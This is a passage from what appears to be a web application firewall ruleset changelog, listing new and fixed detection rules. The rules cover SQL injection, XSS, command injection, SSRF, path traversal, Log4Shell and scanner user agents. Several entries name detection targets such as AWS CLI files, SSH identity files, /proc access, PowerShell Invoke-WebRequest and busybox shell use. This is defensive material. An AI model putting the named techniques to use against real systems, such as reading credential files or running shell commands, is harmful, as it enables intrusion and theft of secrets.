rules to follow new naming convention with paranoia level TX variables (Christoph Hansen) [#2937] + * fix: update various rules to consolidate use of backslashes to \x5c representation for better compatibility with known WAF engines (various rules) (Andrew Howe, Max Leske) [#2335, #2345, #2375, #2376, #2399, #2400, #2402, #2410, #2420, #2441, #2442, #2454, #2426] + * fix: remove initialization rules for redundant IP reputation variables (901150, 901152) (Andrew Howe) [#2833] + * fix: initialize all variables used properly (901169) (Ervin Hegedus) [#2802] + * feat: improve sampling mode efficiency (901410, 901420, 901440) (Paul Beckett) [#2094] + * fix: replace uses of 'ctl:ruleEngine=Off' with "ctl:ruleRemoveByTag=OWASP_CRS" to accomodate more than one ruleset (901450, 905100, 905110) (Jozef Sudolský) [#2156] + * feat: remove old, commented-out IP reputation check rule (910110 PL1) (Paul Beckett) [#2148] + * feat: detect 'burpcollaborator' scanner (913100 PL1) (Amir Hosein Aliakbarian) [#2152] + * feat: detect 'httpx' scanner (913100 PL1) (Will Woodson) [#2045] + * feat: detect 'LeakIX' scanner (913100 PL1) (Jozef Sudolský) [#1961] + * feat: detect 'QQGameHall' malware (913100 PL1) (Walter Hop) [#2144] + * feat: detect User-Agent of Tsunami Security Scanner (913100 PL1) (@hoexter) [#3480] + * fix: avoid FP for YAM package manager (913100 PL1) (Jozef Sudolský) [#2022] + * fix: move 'ecairn' from scanners to crawlers (913100 PL1) (Felipe Zipitría) [#2408] + * feat: detect 'CensysInspect' and seoscanners.net crawlers (913102 PL2) (Andrew Howe) [#2155] + * feat: detect 'ecairn' crawler (913102 PL2) (Jozef Sudolský) [#2024] + * feat: detect 'Krzana' bot (913102 PL2) (Deepshikha Sinha) [#2432] + * fix: remove rule to detect security scanner http headers (913110 PL1) (Christian Folini) [#3241] + * feat: remove ineffective anti-scanner list scanners-urls.data and associated rule (913120 PL1) (Christian Folini) [#3235] + * fix: correct the regular expression assembly (920120 PL1) (Max Leske) [#2333] + * feat: increase rule score from warning to critial (920220 PL1) (Max Leske) [#3512] + * fix: reduce FPs by handling the last path segment separately in new rule (920220 PL1, 920221 PL1) (Max Leske) [#3512] + * fix: reduce FPs by matching on decoded variables (920220 PL1) (Max Leske) [#3512] + * feat: prevent FPs by moving rule to higher PL (920240 PL2) (Max Leske) [#3506] + * feat: valiadate 'SEC-CH-UA' and 'SEC-CH-UA-MOBILE' request headers (920274 PL4) (Chaim Sanders) [#1970] + * fix: use the right kind of validation for 'Sec-CH-UA' and 'Sec-CH-UA-Mobile' request headers (920274 PL4, 920275 PL4) (somechris) [#2028] + * fix: make validatioin of 'Sec-Fetch-User' header more strict (920275 PL4) (somechris) [#2020] + * feat: move rule from PL2 to PL3 (920300 PL3) (Franziska Bühler) [#2013] + * fix: amend rule to exclude CONNECT requests from requiring an Accept header (920300 PL3) (Andrew Howe) [#2297] + * feat: add IPv6 to the 'Host header is a numeric IP address' check (920350 PL1) (itsTheFae, Ervin Hegedus, Jozef Sudolský) [#1929] + * fix: avoid FP on '.axd' in restricted extensions, these are public (920440 PL1) (Jozef Sudolský) [#1925] + * feat: rework restricted headers mechanism into two separate lists (920450 PL1, 920451 PL2) (Andrew Howe) [#3152] + * fix: avoid FP in 'application/\*+json' Content-Type (920470 PL1) (Mirko Dziadzka, Walter Hop) [#2455] + * fix: avoid FP in CalDAV Content-Type (920470 PL1) (Vandan Rohatgi) [#2505] + * fix: avoid FP in 'Content-Type' header with '#' character (920470 PL1) (Jozef Sudolský) [#1856] + * fix: avoid FP on 'version' string in Content-Type header (920470 PL1) (Jozef Sudolský) [#1901] + * fix: resolve false negative when matching against allowed charsets variable (920480 PL1) (katef, Federico G. Schwindt) [#1957] + * fix: replace unnecessary capture groups in regular expressions with non-capturing groups (920510 PL3, 932200 PL2, 942510 PL2, 942511 PL3) (Federico G. Schwindt) [#1983] + * feat: improve explanatory rule comments (920520 PL1) (Max Leske) [#2391] + * feat: validate 'Accept-Encoding' header (920520 PL1, 920521 PL3) (Franziska Bühler) [#2357] + * feat: new rule detect multiple occurrences of charset keyword in content type header (920530 PL1) (Jan Gora / terjanq) [#2571] + * feat: new rule to detect Unicode character bypass check for non JSON requests (920540 PL1) (Franziska Bühler, 0SPwn) [#2512] + * feat: new rule to detect # char in URIs (920610 PL1) (Karel Knibbe) [#2919] + * fix: use correct anomaly scoring variables and paranoia level tags across several rules (921170 PL1, 921220 PL4, 932220 PL2, 932331 PL3, 933211 PL3, 934101 PL1, 942362 PL2, 951100) (Christoph Hansen) [#2931] + * feat: new rules to detect HTTP parameter pollution bypasses (921210 PL3, 921220 PL4) (Christian Folini) [#2747] + * fix: use correct anomaly scoring variables and paranoia level tags across several rules (921220 PL4, 932101 PL2, 932331 PL3, 933211 PL3, 942362 PL2) (Ervin Hegedus) [#2832] + * feat: new rule to detect range header that is now forbidden on PL3 and up (921230 PL3) (Christian Folini) [#2760] + * feat: new rule to detect mod_proxy attack (CVE-2021-40438) (921240 PL1) (Franziska Bühler) [#2818] + * fix: add urlDecodeUni transformation rules with REQUEST_URI / REQUEST_BASENAME in phase 1 (921240 PL1, 920440 PL1, 920201 PL2, 920202 PL4) (Christian Folini) [#3411] + * feat: new rules to detecting ModSecurity body processor confusion using the `Content-Type` HTTP header (921421 PL1, 921422 PL2) (Simon Studer, Ervin Hegedus) [#2763] + * fix: handle false positives when detecting ModSecurity body processor confusion (921422 PL2) (Ervin Hegedus) [#2784] + * feat: new rules detecting attacks on multipart headers (922100 PL1, 922110 PL1, 922120 PL1) (Felipe Zipitría) [#2769] + * fix: prevent unintended match of character set substrings in multipart/form-data requests (922100 PL1) (Jozef Sudolský) [#3470] + * feat: remove redundant t:lowercase for a little performance (922110 PL1) (Jozef Sudolský) [#3469] + * fix: remove possessive quantifiers (922110 PL1) (Felipe Zipitría) [#2989] + * fix: update comments (922110 PL1, 942440 PL2) (Jozef Sudolský) [#3468] + * fix: add missing quotes at the end of action lists (930050) (Ervin Hegedus) [#2184] + * feat: disassemble regular expression (930100 PL1) (Andrew Howe) [#2298] + * fix: detect path traversal in uploaded file names (930100 PL1, 930110 PL1) (k4n5ha0, Franziska Bühler, Felipe Zipitría) [#2451] + * fix: detect triple dot path traversal (930100 PL1, 930110 PL1) (Franziska Bühler) [#2309, #2310] + * feat: extended rule to detect Tomcat specific path traversal attack (930110 PL1) (Christoph Hansen) [#2915] + * fix: avoid FP for '..' without slashes (930110 PL1) (Tetrik, Walter Hop) [#2016] + * feat: block access to AWS CLI files (930120 PL1, 930121 PL2) (Jozef Sudolský) [#2439] + * feat: block access to extended list of sensitive files (930120 PL1, 930121 PL2, 930130 PL1) (Jozef Sudolský) [#1960] + * feat: detect /proc and /sys access attempts (930120 PL1, 930130 PL1) (Andrew Howe) [#2154] + * feat: extend rule to detect access attempts to /tmp/ (930120 PL1, 930121 PL2) (Max Leske) [#3131] + * feat: extend rule to detect ECDSA type SSH identity files via list of sensitive \*nix files (930120 PL1) (Pinaki Mondal / 0xInfection) [#2586] + * fix: avoid detecting Google OAuth2 callback requests as malicious (930120 PL1, 930121 PL1) (Jozef Sudolský, Christian Folini) [#1958] + * feat: extend rule to detect additional sensitive files on \*nix systems (930121 PL2, 930130 PL1) (Gwendal Le Coguic / gwen001) [#2560] + * feat: new rules to detect LFI and SQLi in user-agent and referer request headers (930121 PL2, 942152 PL2, 942321 PL2) (Franziska Bühler, Max Leske, Shivam Bathla) [#3102] + * fix: extend rule to detect more LFI (930121 PL2) (Felipe Zipitría) [#2791] + * feat: add BlockCypher.log to restricted-files.data (930130 PL1) (Jozef Sudolský) [#3501] + * feat: add 'sslvpn_websession' to restricted-files.data (930130 PL1) (Jozef Sudolský) [#2338] + * feat: add .vscode to restricted-files.data (930130 PL1) (Frederik Himpe) [#3471] + * feat: extend data file to include additional restricted file names (restricted-files.data, 930130 PL1) (Jitendra Patro) [#3219] + * feat: extend data file to include PrestaShop configuration file (restricted-files.data, 930130 PL1) (Jean-François Viguier) [#3192] + * feat: extend rule to detect `npm-shrinkwrap.json` to restricted-files (930130 PL1) (Esa Jokinen / oh2fih) [#2627] + * fix: block access to the Java-related WEB-INF directory (930130 PL1) (Jozef Sudolský) [#2092] + * fix: remove duplicate keyword (930130 PL1) (Jozef Sudolský) [#3517] + * feat: extend rules to detect additional protocols in RFI attacks (931130 PL2, 934120 PL2) (Karel Knibbe) [#2572] + * feat: extend rule to detect `url:file:` schema in Java RFI attacks (931130 PL2) (Andrew Howe) [#2727] + * fix: add local_file scheme from Python 2 (931130 PL2, 934120 PL2) (Felipe Zipitría) [#2809] + * fix: close userinfo-based bypass (931130 PL2) (Andrea Menin) [#2479] + * feat: new rule to detect path traversal attacks using URL encoded URL schemes in Java applications (931131 PL2) (Christoph Hansen) [#2902] + * feat: extend rule to detect additional \*nix shell commands (931160 PL1) (Gwendal Le Coguic / gwen001) [#2563] + * feat: disassemble complex regexes for 932xxx rules that were subsequently replaced by other rules (Max Leske) [#2566] + * feat: detect additional Unix RCE commands (932100 PL1, 932105 PL1) (Felipe Zipitría) [#2129] + * feat: extend rule to detect additional entries to \*nix command lists (932100 PL1, 932105 PL1) (Finn Westendorf / wfinn) [#2552] + * feat: extend rule to detect additional \*nix commands (932100 PL1) (Felipe Zipitría) [#2676] + * feat: improve and extend cmdline processor to find more evasions (932100 PL1, 932105 PL1, 932230 PL1, 932150 PL1, 932175 PL1, 932220 PL2, 932240 PL1, 932106 PL3) (Felipe Zipitría) [#2907] + * fix: avoid false positive with certain HTML character entities (932100 PL1) (Franziska Bühler) [#1954] + * feat: move \*nix command injection rule 932101, 932106 into the same range as the other \*nix command injection rules (932231 PL2, 932232 PL3) (Felipe Zipitría, Max Leske) [#3092] + * feat: extend rule to detect additional \*nix commands (932105 PL1) (Felipe Zipitría) [#2677] + * feat: extend rule to detect `mshta` in Windows shell commands (932110 PL1) (Somdev Sangwan / s0md3v) [#2588] + * feat: new Windows commands rules based on lolbas-project replacing 932110, 932115 (932370 PL1, 932380 PL1) (Felipe Zipitría, Franziska Bühler, Max Leske) [#3059, 3170] + * fix: avoid false positive on 'sort' (932115 PL1) (Franziska Bühler) [#2012] + * feat: detect 'Invoke-WebRequest' command (932120 PL1) (Paul Beckett) [#2271] + * feat: extend rule to detect additional PowerShell cmdlet on Windows (932120 PL1) (Pinaki Mondal / 0xInfection) [#2589] + * feat: extend rule to detect PowerShell RCEs better via new automation (932120 PL1) (Felipe Zipitría) [#2669] + * feat: new rule to detect Windows cmdlet aliases (932125 PL1) (Pinaki Mondal / 0xInfection) [#2589] + * fix: extend rule to detect character class \*nix expressions (932130 PL1) (Somdev Sangwan / s0md3v, Walter Hop) [#2594] + * feat: new rules to detect Log4j / Log4Shell attacks (932131 PL2, 944150 PL1, 944151 PL2, 944152 PL4) (Christian Folini, Max Leske) [#2349] + * fix: prevent false positives against brackets in User-Agent header (932131 PL2) (Max Leske) [#3486] + * feat: extend rule to detect `busybox`, `$SHELL`, and `${SHELL}` in \*nix RCE attacks (932150 PL1) (Walter Hop) [#2728] + * feat: extend rule to detect C99 and printf utilities (932150 PL1) (Karel Knibbe) [#2569] + * feat: extend rule to detect `ksh` in \*nix RCE attacks (932150 PL1) (Andrew Howe) [#2721] + * feat: extend rule to detect RCE attacks using compression utilities (932150 PL1) (Andrew Howe) [#2712] + * feat: extend rule to detect RCEs using Base64 evasions (932150 PL1) (Somdev Sangwan / s0md3v, Andrew Howe) [#2590] + * feat: extend rule to detect RCEs using evasions quotes with `python...` commands (932150 PL1) (Somdev Sangwan / s0md3v, Andrew Howe) [#2590] + * feat: new rule to detect generalised \*nix RCE (932150 PL2) (Karel Knibbe) [#2583] + * feat: replace \*nix command injection rules 932150 PL1, 932151 PL1 with new rules for commands of less than 4 characters and commands of more than 4 characters in length respectively (932250 PL1, 932260 PL1) (Felipe Zipitría, Max Leske) [#3092] + * fix: avoid FP on 'time' and 'ping' keywords (932150 PL1) (Walter Hop) [#2457] + * feat: extend rule to detect RCE better via automation (932160 PL1) (Felipe Zipitría) [#2662] + * fix: remove unnecessary prefixes from paths in `unix-shell.data` (932160 PL1) (Felipe Zipitría) [#2662] + * feat: extend rule to detect `expre` in unix-shell list (932161 PL2) (Felipe Zipitría) [#2667] + * feat: new rules to detect \*nix commands in user-agent and referer request headers (932161 PL2, 932237 PL3) (Franziska Bühler, Max Leske, Shivam Bathla) [#3132] + * feat: new rule detecting `alias` builtin (932175 PL1) (Felipe Zipitría) [#2796] + * feat: use new automation to generate `restricted-uploads.data` from `restricted-files.data` (932180 PL1) (Max Leske) [#3282] + * fix: use correct anomaly scoring variable (932180 PL1, 932200 PL2) (Jozef Sudolský) [#2324] + * feat: detect RCE attempts with uninitialized shell vars (932200 PL2) (Andrea Menin) [#2151] + * feat: extend rule to detect RCE in user-agent request header (932200 PL2) (Franziska Bühler, Shivam Bathla) [#3108] + * feat: reduce FPs by removing User-Agent from individual target list (932200 PL2) (Max Leske) [#3489] + * fix: generate correct log entries when using 'MATCHED_VAR_NAME' in conjunction with chain rules (932200 PL2, 933120 PL1, 933151 PL2) (Jozef Sudolský) [#2347] + * fix: new rules to handle referer header and fix false positive (932205 PL2, 932206 PL2) (Max Leske) [#3300] + * feat: extend rule to detect quote evasion (932210 PL2) (Max Leske) [#3120] + * feat: extend rule to detect `sh` (932210 PL2) (Franziska Bühler) [#2816] + * feat: extend rule to detect SQLi via automation of keyword list updates (932210 PL2) (Felipe Zipitría) [#2801] + * feat: new rule to detect SQLite system command injection (932210 PL2) (flo405, Andrea Menin, Christian Folini) [#2032] + * fix: add word boundaries for sh in RCE rules (932230 PL1, 932250 PL1) (Max Leske) [#3186] + * fix: avoid FPs in RCE detections against words 'environment' and 'performance' (932230 PL1, 932235 PL1, 932260 PL1, 932236 PL2, 932237 PL3, 932239 PL2) (Esad Cetiner) [#3477] + * fix: handle false positive against `sh` in \*nix command injection attacks (932230 PL1, 932250 PL1, 932236 PL2) (Max Leske) [#3186] + * feat: add unix commands pyversions and py3versions (932235 PL1, 932260 PL1, 932236 PL2, 932237 PL3, 932239 PL2) (Jitendra Patro) [#3465] + * feat: replace \*-with-params.ra files with suffix replacements (932235 PL1, 932236 PL2, 932239 PL2, 932237 PL3) (Max Leske) [#3331] + * fix: prevent FP on keywords 'more' and 'time' in Unix RCE (932235 PL1) (Franziska Bühler) [#3488] + * fix: reduce FPs at the start of strings by excluding 'as' and 'at' (932236 PL2) (Franziska Bühler, Max Leske, Andrew Howe) [#3531 + * fix: prevent FPs against names due to "axel" and "perl" (932235 PL1, 932260 PL1, 932236 PL2, 932239 PL2, 932237 PL3) (@superlgn) [#3492] + * fix: add whitespace after keywords `mail` and `task` to solve false positives (932236 PL2) (Franziska Bühler) [#3274] + * fix: align unix-shell-upto3* files (932236 PL2) (Max Leske) [#3128] + * fix: handle false positives with word "settings" (932236 PL2, 932237 PL3, 932239 PL2) (Esad Cetiner) [#3394] + * fix: prevent FP on keywords more and time in Unix RCE (932236 PL2) (Franziska Bühler) [#3487] + * fix: solved false positives with creation of word boundaries for commonly used words used in \*nix RCE rules (932236 PL2) (Max Leske) [#3187] + * fix: use correct anomaly scoring variable (932236 PL2) (Ervin Hegedus) [#3112] + * fix: improve rule by matching non-word-boundary of commands with options (932237 PL3) (Max Leske) [#3425] + * feat: new rule to detect \*nix commands in user-agent and referer request headers (932239 PL2) (Franziska Bühler, Shivam Bathla) [#3104, #3318] + * fix: reduce FPs in generic quote evasion detection (932240 PL2) (Max Leske) [#3494] + * fix: remove ARGS_NAME from target variables in (932240 PL2) (Andrea Menin) [#2960] + * fix: use correct anomaly scoring variables and paranoia level tags across for rule (932240 PL2) (Ervin Hegedus) [#2963] + * fix: false positives by requiring specific tokens to follow commands (932250 PL1) (Max Leske) [#3186] + * fix: Added missing target name to logdata (932260 PL1, 932240 PL2) (Ervin Hegedus) [#3409] + * fix: remove chained rule (932260 PL1) (Max Leske) [#3521] + * feat: new rules to detect email protocol attacks (932300 PL2, 932310 PL2, 932320 PL2) (Felipe Zipitría) [#2322] + * fix: remove additional range expression that cause parsing errors for RE2 (932311 PL3) (Felipe Zipitría) [#2484] + * feat: new rules to detect detecting \*nix shell history invocations (932330 PL1, 932331 PL3) (Karel Knibbe) [#2577] + * fix: remove 'time' prefix from Windows RCE detection (932370 PL1, 932380 PL1) (Max Leske) [#3528] + * feat: extend rule to detect additional file extensions via list of executable PHP files (933110) (Jan Gora / terjanq) [#2585] + * feat: extend data file to add missing PHP config directives (php-config-directives.data, 933120 PL1) (Max Leske) [#3028] + * feat: extend rule to detect additional sensitive PHP directives (933120 PL1) (Gwendal Le Coguic / gwen001) [#2561] + * feat: extend rule to detect PHP config directives via automation of keyword list updates (933120 PL1) (Felipe Zipitría) [#2696] + * feat: extend rule to detect sensitive PHP variables better (933130 PL1) (Felipe Zipitría) [#2668] + * tests: clean test definitions and provide proper descriptions (933150 PL1, 933160 PL1) (Andrea Menin, Matteo Pace, Max Leske) [#3462] + * feat: extend data file to include additional php function names (php-function-names-933151.data, 933151 PL2) (Jitendra Patro) [#3212] + * feat: automate generation of PHP function dictionaries, revisited detection (933160 PL1, 933161 PL3, 933150 PL1, 933151 PL2) (Juan-Pablo Tosso, Christian Folini, Matteo Pace) [#3273] + * feat: extend rule to detect `document.domain` XSS (933160 PL1, 941180 PL1) (Franziska Bühler, 0SPwn) [#2567] + * feat: extend rule to detect evasions in PHP contexts with `"` (933160 PL1) (Somdev Sangwan / s0md3v) [#2596] + * feat: rearrange keywords (933160 PL1, 941390 PL1) (Karel Knibbe) [#2905] + * fix: handle false positive by fixing whitespace matching after PHP command (933160 PL1) (Max Leske) [#3432] + * fix: solve ReDoS issue in rule (933161 PL3) (Andrea Menin) [#2302] + * feat: extend rule to detect `bzip2` wrapper in PHP injection attacks (933200 PL1) (Andrew Howe) [#2723] + * feat: extend rule to detect `ssh2.\*` wrappers in PHP injection attacks (933200 PL1) (Andrew Howe) [#2731] + * fix: avoid false positive when cookie contains slash (933210 PL1) (Ervin Hegedus) [#1996] + * fix: close PHP whitespace bypass (933210 PL1) (Walter Hop) [#2033] + * fix: prevent excessive backtracking (933210 PL1) (Andrea Menin) [#2214] + * feat: new rule to detect PHP injection attacks without terminating semi-colon (933211 PL3) (Karel Knibbe) [#2581] + * feat: extended rule to detect Node.js injection attacks using `require` and `child_process` (934100 PL1, 932101 PL2) (Andrea Menin) [#2893] + * feat: extend rule to detect Node.js RCE better (934100 PL1) (rektor0) [#2578] + * feat: improve transformation pipeline to detect Base64-encoded evasions (934100 PL1) (Andrew Howe) [#3203] + * feat: new rule to detect Node.js RCE detection (934101 PL2) (rektor0) [#2578] + * fix: improve js rule transformation pipelines (934101 PL1, 934130 PL1, 934169 PL1, 934131 PL2) (Andrew Howe) [#3312] + * feat: extend data file to include additional indicators (ssrf.data, 934110 PL1) (Jitendra Patro) [#3213] + * feat: extend rule to detect SSRF better (934110 PL1) (Felipe Zipitría) [#2660] + * feat: new rules to detect common IP-based SSRF targets (934110 PL1, 934120 PL2) (Felipe Zipitría) [#2259] + * feat: extend rule to detect additional schema and IP evasion techniques in SSRF (934120 PL2) (Felipe Zipitría, Max Leske) [#2599] + * feat: extend rule to detect octal address of AWS metadata endpoints (934120 PL2) (Karel Knibbe) [#2555] + * feat: extend rule to detect SSRF better by inspecting targets beyond just ARGS (934120 PL2) (Karel Knibbe) [#2555] + * feat: new rules to detect JavaScript prototype pollution (934130 PL1, 934131 PL2) (Walter Hop) [#2411] + * fix: remove base64 transformation due to limited effectiveness and to align behavior across ModSecurity v2.x and libModSecurity v3.x engines (934130 PL1) (Andrea Menin) [#3378] + * fix: remove overly specific rule with limited benefits and lack of cross-engine compatibility (934131 PL2) (Andrea Menin) [#3378] + * feat: new rules to detect detection of Perl and Ruby RCE signatures in a generic way (934140 PL2, 934150 PL1) (Karel Knibbe) [#2587] + * feat: new rule to detect Node DoS attack via expressions resolving to true (934160 PL1) (Karel Knibbe) [#2917] + * feat: new rule for PHP supporting `data:` scheme without using `//` before the content-type (934170 PL1) (Felipe Zipitría) [#3018] + * feat: extend rules to detect path based XSS via new target REQUEST_FILENAME in 941xxx rules (Walter Hop) [#2894] + * feat: run libinjection XSS detector on request filename in PL2 (941101 PL2) (Andrew Howe) [#2208] + * feat: move rule from PL1 to PL2 (941120 PL2) (Christian Folini) [#2306] + * fix: avoid false positive by adding character limit (941120 PL2) (Christian Folini) [#1872] + * fix: avoid FP in Base64 content (941120 PL1) (Jozef Sudolský) [#2226] + * fix: remove unnecessary character escape (941120 PL2) (Andrew Howe) [#2805] + * fix: avoid FP in XMLNLS (941130 PL1) (Walter Hop) [#2192] + * fix: solve ReDoS issue in rule (941140 PL1) (Andrea Menin) [#2050] + * feat: detect 'dialog' tag in XSS no-script payloads (941160 PL1) (Jitendra Patro) [#3473] + * feat: disassemble complex regex fully (941160 PL1) (Felipe Zipitría) [#2701] + * fix: make regular expression more restrictive (941170 PL1) (Andrea Menin) [#2292] + * fix: new rule at PL2 to move the detection of '-->' out of PL1 due to false positives (941181 PL2) (Paul Beckett) [#2082] + * feat: disassemble complex regex (941210 PL1) (Felipe Zipitría) [#3262] + * feat: extend rule to detect XSS evasions using carriage return (\r) and new line (\n) characters (941210 PL1) (oct0pus7) [#2576] + * feat: disassemble complex regex (941220 PL1) (Felipe Zipitría) [#3263] + * fix: correct numerical values used for HTML entity evasion detection (941220 PL1) (Jitendra Patro) [#3479] + * fix: avoid false positive with Russian characters (941310 PL1) (Max Leske) [#2107] + * feat: improve detection by adding missing javascript `prompt` and `confirm` methods (941390 PL1) (Jitendra Patro) [#3395] + * feat: new rule to detect JavaScript methods (941390 PL1) (Franziska Bühler) [#2702] + * feat: extend rule and moved rule from PL3 to PL2 (942101 PL2) (Matteo Pace) [#2922] + * feat: extended rule to detect common SQL injection probing in path segments (942110 PL2) (Andrea Menin) [#2914] + * feat: prevent FPs by removing rule (942110 PL2) (Max Leske) [#3505] + * feat: add target REQUEST_FILENAME to rule to detect path-based SQLi attacks (942120 PL2) (Andrew Howe) [#3057] + * feat: extend rule to detect use of `collate` in SQLite injection attacks (942120 PL2) (Jan Gora / terjanq) [#2584] + * fix: extend rule to detect more SQLi (942120 PL2) (Karel Knibbe) [#2556] + * fix: resolve issue with regular expression and improve SQLi detection by detecting 'not between' (942120 PL2) (NiceYouKnow, Max Leske, Franziska Bühler) [#2115] + * fix: update SQL reserved words (942120 PL2) (Felipe Zipitría) [#2798] + * feat: extend rule to detect `glob` in list of SQLi tautologies (942130 PL2) (Franziska Bühler) [#2729] + * fix: remove unneeded TX variables (942130 PL2, 942131 PL2, 942521 PL3) (Andrea Menin) [#3293] + * feat: detect more error-based SQL injections (942150 PL2, 951230 PL1) (Jozef Sudolský) [#2429] + * feat: extend rule to detect more SQL function names (942150 PL2) (Karel Knibbe) [#2895] + * feat: extend rules to detect more SQL error messages and functions (942151 PL1, 942152 PL1, 951220 PL1, 951230 PL1, 951240 PL1) (Jitendra Patros) [#3336] + * feat: extend rule to detect additional SQL function signatures (942151 PL1) (Karel Knibbe) [#2570] + * feat: extend rule to detect `endswith`, `startswith`, `unistr`, `pg_client_encoding` and various JSON SQL functions (942151 PL1) (Franziska Bühler) [#2874] + * feat: extend rule to detect various JSON functions (942151 PL1) (Franziska Bühler) [#3041] + * fix: avoid FP in SQL function names by splitting between PL1/PL2 (942151 PL1, 942150 PL2) (Jozef Sudolský) [#2480] + * feat: extend rule to detect `sql_compileoption_get` in SQLite injection attacks (942152 PL1) (Andrew Howe) [#2718] + * fix: extend blind SQLi detection (942160 PL1) (Franziska Bühler, Christian Folini) [#1956] + * feat: new regex-assembly file for rule (942170 PL1) (Andrea Menin) [#2939] + * feat: extend rule to detect SQL injection authentication bypasses (942180 PL2) (rekter0) [#2575] + * feat: improve SQLi detection with spaces (942190 PL1, 942390 PL2) (Manuel Spartan, Max Leske) [#2436] + * fix: avoid FP in SQLi by adding word boundary checks (942190 PL1) (Jozef Sudolský) [#2078] + * fix: avoid FP in SQLi with keyword 'union' (942190 PL1) (Franziska Bühler) [#2058] + * fix: prevent comment-based SQL evasion (942190 PL1) (Andrea Menin) [#1910] + * fix: resolve bug in regular expression and add test case (942190 PL1) (NiceYouKnow, Max Leske, Franziska Bühler) [#2112] + * feat: disassemble complex regex (942200 PL2) (Franziska Bühler, Max Leske) [#2932] + * feat: extend rule to detect SQLi in user-agent and referer request headers (942200 PL2, 942370 PL2) (Franziska Bühler, Shivam Bathla) [#3106] + * feat: improve regex-assembly file for rule (942210 PL2) (Andrew Howe) [#2945] + * fix: detect the correct magic numbers that crash old PHP versions (942220 PL1) (Kyzentun, Walter Hop) [#2010] + * fix: avoid false positive with 'case' (942230 PL1) (Franziska Bühler) [#2035] + * fix: detect SQL false negative (942230 PL1) (Max Leske) [#2348] + * feat: disassemble complex regex (942240 PL1) (Franziska Bühler, Max Leske) [#2938] + * fix: avoid FP in 'having' SQLi (942251 PL3) (Felipe Zipitría) [#2248] + * feat: new regex-assembly file for rule (942280 PL1) (Andrea Menin) [#2933] + * feat: extend rule to detect additional MongoDB operators via NoSQL commands list (942290 PL1) (rekter0) [#2579] + * feat: new regex-assembly file for rule (942290 PL1) (Andrea Menin) [#2942] + * feat: improve regex-assembly format (942300 PL2) (Felipe Zipitría) [#3296] + * fix: avoid false positive by adding word boundary checks (942300 PL2) (Franziska Bühler) [#2099] + * fix: remove unnecessary part of regular expression (942310 PL2) (NiceYouKnow) [#2189] + * feat: extend rule to detect `::int` and `::bool` SQL data conversions (942320 PL1) (Franziska Bühler) [#2872] + * feat: extend rule to detect `lo_get` and `::text` via PostgreSQL functions list (942320 PL2) (Franziska Bühler, Walter Hop, Shivam Bathla) [#2925] + * feat: extend rule to detect `lo_import` and `div` via PostgreSQL functions list (942320 PL2) (Franziska Bühler, Shivam Bathla) [#2916] + * feat: extend rule to detect more PostgreSQL data types (942320 PL2) (Franziska Bühler, Shivam Bathla) [#3019] + * fix: add word boundaries to keywords to solve false positives (942330 PL2) (Franziska Bühler) [#3207] + * feat: extend rule to detect SQL injection better (942340 PL2) (Karel Knibbe) [#2557] + * fix: extend rule to detect more SQLi (942340 PL2) (Jan Gora / terjanq) [#2559] + * feat: detect SQLi using the 'drop' keyword (942350 PL1, 942360 PL1, 942200 PL2, 942362 PL2) (Jozef Sudolský) [#2218] + * fix: solve ReDoS issue in rule (942350 PL1) (Andrea Menin) [#2300] + * feat: new regex-assembly file for rule (942370 PL2) (Christoph Hansen, Max Leske) [#2954] + * feat: detect SQLi with 'if exists' (942380 PL2) (NiceYouKnow) [#2121] + * feat: optimize regex (942400 PL2) (Jozef Sudolský) [#2323] + * feat: disassemble complex chained regex (942440 PL2) (Felipe Zipitría) [#3295] + * feat: optimize regex (942440 PL2) (Felipe Zipitría) [#2459] + * fix: adapt rule to work in all ModSecurity versions (942440 PL2) (Andrew Howe) [#2201] + * fix: avoid FP in JWT tokens (942440 PL2) (Andrea Menin) [#2460] + * fix: reformat rules to follow project guidelines (942440 PL2, 949959, 949159, 959059, 959159) (Ervin Hegedus) [#3206] + * fix: solve errors in regex pattern (942440 PL2) (Andrea Menin) [#3290] + * fix: prevent FPs for click identifiers in query string by placing arg specific rule exclusions in rule set (942441, 942442) (Max Leske) [#3500] + * feat: extend rules to detect `current_user` and `overlay` (942470 PL1, 942480 PL2) (Franziska Bühler) [#2875] + * feat: extended rule to detect detect SQL injection attacks using headers (942480 PL2) (Paul Beckett) [#2911] + * feat: extend rule to detect newlines in overlay (942480 PL2) (Franziska Bühler, Shivam Bathla) [#3040] + * fix: detect MySQL optimizer hints (942500 PL1) (Max Leske) [#3431] + * feat: new rules to detect SQL authentication bypasses (942520 PL2, 942521 PL2, 942522 PL2) (Jan Gora / terjanq) [#2603] + * feat: extend rule to detect SQLi in user-agent and referer request headers (942521 PL2) (Franziska Bühler, Shivam Bathla) [#3107] + * fix: replace 'MATCHED_VAR' in 'logdata' argument with stable variable (942521 PL2, 943110 PL1, 943120 PL1) (Ervin Hegedus) [#3543] + * feat: new rule to detect `';` in SQLi (942530 PL3) (Franziska Bühler) [#2808] + * feat: new rule to detect authentication bypass via SQL injection that abuses semi-colons to end the SQL query (942540 PL1) (Karel Knibbe) [#2904] + * fix: update scoring variable (942540 PL2) (Walter Hop) [#2970] + * feat: new rule to detect MySQL scientific notation attacks (942560 PL1) (Jitendra Patro) [#3316] + * fix: remove unnessecary 'lowercase' transformation from chain rule (944120 PL1) (Federico G. Schwindt) [#1852] + * feat: extend rule to detect JAVA exploits better via java-classes.data file (944130 PL1) (Dennis Brown) [#3048] + * feat: new rule to deny uploading .jsp and .jspx files (944140 PL1) (Walter Hop) [#2456] + * feat: new rule to detect Spring4Shell (944260 PL2) (Christian Folini, Andrea Menin) [#2464] + * fix: update administrative rule ids for consistent operation (950011, 950012, 950018) (Ervin Hegedus) [#3339] + * feat: improve rule file 951xxx via the use of `skipAfter` instead of variable `TX:sql_error_match` (Jozef Sudolský) [#2754] + * feat: extend data file to include additional SQL error messages (sql-errors.data, 951100 PL1) (Jitendra Patro) [#3214] + * fix: avoid FP in MySQL data leakage rule (951230 PL1) (Jozef Sudolský) [#2490] + * fix: avoid FP in PostgreSQL error messages (951240 PL1) (Jozef Sudolský, Franziska Bühler) [#1870, #2313] + * fix: handle false positive in SQL error leakage detection (951240 PL1) (Jozef Sudolský) [#3169] + * fix: avoid FP in Sybase error message (951260 PL1) (Jozef Sudolský) [#2307] + * feat: extend rule to detect PHP errors better via new automation (953100 PL1) (Felipe Zipitría) [#2663] + * feat: new rules to detect PHP error leakages with high false positive rates at paranoia level 2 instead of 1 (953100 PL1, 953101 PL2) (Andrea Menin) [#3119] + * fix: solve false positive by shifting "Field cannot be empty" to PL2 (953100 PL1, 953101 PL2) (Esad Cetiner) [#3407] + * fix: 